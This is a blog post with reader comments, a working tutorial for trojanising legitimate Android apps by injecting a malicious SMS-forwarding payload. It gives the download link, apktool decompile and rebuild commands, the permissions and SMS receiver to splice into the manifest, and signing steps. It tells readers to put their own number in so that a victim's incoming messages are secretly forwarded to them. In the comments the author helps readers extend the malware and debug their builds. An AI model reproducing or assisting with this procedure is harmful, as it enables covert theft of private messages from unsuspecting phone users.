Information Security, Web, Networks and Systems

Thursday, September 5, 2013

Android Malware Injection into Original Apps

In this post I describe how a malicious app can be injected into an original app, working on Ubuntu. For this post I have created a small malicious app which intercepts incoming SMS messages and forwards them to another person without the victim knowing when a message is received. You need the following files to do this:
apktool (for Windows, you may need to download a Windows version of apktool here)
SignAPK.jar + keys
Malicious SMSHacker.apk app

You can download all of these from this link:
http://www.mediafire.com/folder/64dsan4mpnxdu/appinjection

Here is a rough sketch of the process:
1. Decompile the original Android app (.apk) using apktool
2. Decompile the malicious Android app (SMSHacker.apk) using apktool
3. Inject the decompiled malicious app's files into the decompiled original app (copy the malicious files in)
4. Inject the permissions from the malicious apk file's AndroidManifest.xml into the original file's AndroidManifest.xml
5. Recompile the infected original app using apktool
6. Sign the recompiled app using signapk.jar
7. Install the recompiled, signed apk file onto the victim's device

Let's follow the listed steps:

Step 1:

Download all the files I have given in the above mediafire link. I have included all required files, including a sample SMSHacker app to test with. Copy all the files into a single directory.

Copy the apk file into which you want to inject SMSHacker into the same directory. You can keep your apk file in your own directory, but then you need to give the path to it explicitly in the following step.

Open a terminal and go to that directory. Run the following command to decompile your original apk file (Android app). Let's say your original apk filename is myapp.apk:

./apktool d myapp.apk MyAppDec

In this command, the 'd' switch means you are decompiling the myapp.apk file, and 'MyAppDec' names the directory, in the same folder, into which the decompiled app is written.

Step 2:

Now decompile your malicious file too (SMSHacker.apk):

./apktool d SMSHacker.apk SMSHackerDec

You'll then see two directories called SMSHackerDec and MyAppDec in the same folder, containing the decompiled files.

Step 3:

If you browse into these folders, you'll note that there is a folder called smali in both of the decompiled app folders. This smali folder holds all the decompiled code from the apk: when you decompile an apk, its code is written out as files of type .smali. Now go into the folder which holds all the smali files of the malware (SMSHacker) with this command.

cd SMSHackerDec/smali/com/sms/smshacker/

Then open SMSHacker.smali file in gedit.

gedit SMSHacker.smali

I created this malware and tested it on emulators, so I have set the SMS forwarding mobile number to '5554'. You can change it to your own one and let all messages the victim receives be forwarded to your own number. So search for the string '5554' in the SMSHacker.smali file and replace it with your preferred number. (say your backup phone :D).

Now copy these malicious files into decompiled original app's files.

cd ../../../../../;
cp SMSHackerDec/smali/com/* -R MyAppDec/smali/com/;

The files are now injected into the original app's folder. Next we need to inject the required permissions from SMSHacker's AndroidManifest.xml file into the original app's AndroidManifest.xml file.

Step 4:

Open SMSHacker's AndroidManifest.xml file in gedit.

gedit SMSHackerDec/AndroidManifest.xml

You'll see three lines in the file like these.

<uses-permission android:name="android.permission.RECEIVE_SMS" />
<uses-permission android:name="android.permission.SEND_SMS" />
<uses-permission android:name="android.permission.READ_PHONE_STATE" />

We do not actually need the third permission for this purpose. So copy the first two lines into the MyAppDec/AndroidManifest.xml file, before the <application> tag.

You will also see a few lines like the following inside the malicious file's AndroidManifest.xml:

<receiver android:name="com.sms.smshacker.SMSHacker">
    <intent-filter>
        <action android:name="android.provider.Telephony.SMS_RECEIVED" />
    </intent-filter>
</receiver>

Copy this part into MyAppDec/AndroidManifest.xml, within the <application> tag and before the first <activity> tag.

Now save the MyAppDec/AndroidManifest.xml file and close gedit.

We have now successfully injected the files and permissions, and can recompile the new app using apktool.

Step 5:

Go to the directory where apktool and other files exist and run apktool to recompile the app.

./apktool b -f MyAppDec myhackedapp.apk

The 'b' switch means build and the '-f' switch means 'force'. With '-f', apktool skips its check for changed files and rebuilds everything.

After running that command you'll see a new myhackedapp.apk file inside the same folder.

Step 6:

We need to sign that app using signapk.jar before installation. This signing task is important before installation since you cannot install an app on a device or an emulator without signing it.

Sign your apk file using the following command.

java -jar signapk.jar testkey.x509.pem testkey.pk8 myhackedapp.apk myhackedapp-signed.apk

You'll see your signed apk file named myhackedapp-signed.apk.

Now we are done. We can install this apk file on any device and let the victim execute the malicious code.

This SMSHacker.apk is actually an app with a broadcast receiver. When a message is received, the receiver gets invoked and executes the code inside its handler. I have included code to forward the message to another phone inside the handler. The <receiver> information has to be present in AndroidManifest.xml for this to work, which is why we injected the <receiver> element from the malicious manifest file into the original manifest file. We also require permissions to read an incoming message and to send an SMS, so we injected the permissions to receive SMS and send SMS into the original app's manifest.

When installed, this is visible as a normal app on the victim's device, and when the victim runs the app for the first time the receiver starts. After that, if the victim closes the original app, the receiver continues listening for incoming SMS.

I have included this in a module in the Android Exploitation Framework I am currently developing for a project. In that framework, one can use many types of payloads to inject to any original app.

Thanks for reading and if there are any issues, post a comment below.

13 comments:

  1. hey bro can you please tell me is it possible to create similar malware such as this one that sends sms to a number of ur choosing just that it does exactly the opposite that it allows you to type ur own text message and make that sms sent on that phone or even make a call and have that happen on the infected phone ?

    Replies
    1. If you have permission to send SMS, you can craft your own message and send to a number of your choice. You can do whatever is possible with the android device if you get the proper permission for it. If the victim grants you permission to use the phone to call, your malware can even make a call. Have a look at these permissions.
      (http://developer.android.com/reference/android/Manifest.permission.html).

    2. thank you for the fast reply deepal but can you please make a tutorial for it it seems you could modify your SMShacker.apk to do that right ? because i noticed it also needs permissions to send sms since it sends to a number of your choosing so all what is needed to change the code so you can send a custom sms to a custom number and ofc an option to send that sms as many times as u want to that number, i guess that would be easier than also making a call from the infected phone since he would see the call correct ?

    3. I'm a bit out of blogging these days since I'm busy. I'll give you a couple of hints. Have a look at this post on stackoverflow: http://stackoverflow.com/questions/3593420/is-there-a-way-to-get-the-source-code-from-an-apk-file . You'll be able to go through the code and find where the content of the message and destination phone number is set. Update them as you wish and recompile it to an APK.

  2. when trying to build the apk file, always get error

    -----------------------------------------------------
    root@bt:~# apktool b -f /root/Desktop/angrybirds/ angrybirds.apk

    Exception in thread "main" brut.androlib.AndrolibException: brut.directory.PathNotExist: apktool.yml
    at brut.androlib.Androlib.readMetaFile(Androlib.java:164)
    at brut.androlib.Androlib.build(Androlib.java:183)
    at brut.androlib.Androlib.build(Androlib.java:176)
    at brut.apktool.Main.cmdBuild(Main.java:228)
    at brut.apktool.Main.main(Main.java:79)
    Caused by: brut.directory.PathNotExist: apktool.yml
    at brut.directory.AbstractDirectory.getFileInput(AbstractDirectory.java:103)
    at brut.androlib.Androlib.readMetaFile(Androlib.java:160)
    ... 4 more

    what should i do ???? i searched a lot and i don't know if this error is from my command or an apktool problem ?

  3. try to copy apktool.yml to the app files folder

    and i get another error



    apktool b -f /root/Desktop/angrybirds/ angrybirds.apk
    I: Smaling...
    Exception in thread "main" brut.androlib.AndrolibException: java.io.FileNotFoundException: /root/Desktop/angrybirds/smali/com/google/android/gms/tagmanager/cb.smali (Too many open files)
    at brut.androlib.src.DexFileBuilder.addSmaliFile(DexFileBuilder.java:36)
    at brut.androlib.src.SmaliBuilder.buildFile(SmaliBuilder.java:66)
    at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:50)
    at brut.androlib.src.SmaliBuilder.build(SmaliBuilder.java:37)
    at brut.androlib.Androlib.buildSourcesSmali(Androlib.java:257)
    at brut.androlib.Androlib.buildSources(Androlib.java:214)
    at brut.androlib.Androlib.build(Androlib.java:205)
    at brut.androlib.Androlib.build(Androlib.java:176)
    at brut.apktool.Main.cmdBuild(Main.java:228)
    at brut.apktool.Main.main(Main.java:79)
    Caused by: java.io.FileNotFoundException: /root/Desktop/angrybirds/smali/com/google/android/gms/tagmanager/cb.smali (Too many open files)
    at java.io.FileInputStream.open0(Native Method)
    at java.io.FileInputStream.open(FileInputStream.java:195)
    at java.io.FileInputStream.<init>(FileInputStream.java:138)
    at brut.androlib.src.DexFileBuilder.addSmaliFile(DexFileBuilder.java:33)

  4. Thank you very much, worked fine for me. This tutorial is really well explained.

  5. Can you please publish the SMSHacker.apk source code? I really need it (Mostly the .java files)

    Replies
    1. Hi, Please send me an email to [email protected]. Unfortunately I don't have the source right now. I can provide you the APK file which you can decompile. Please use it for educational purposes only.

  6. I sent you a mail. Please check it.

  7. Hi, it was a good tutorial. Everything works for me except I am not able to install newly made apk (signed one). While installing, adb shows an error as follows :
    Failure [INSTALL_FAILED_UPDATE_INCOMPATIBLE]

    Replies
    1. Thanks for the appreciation. The error says that the apk is already installed in the device. Try uninstalling it first and reinstalling.

  8. Hi, Excellent, it works even after reboot... very good job
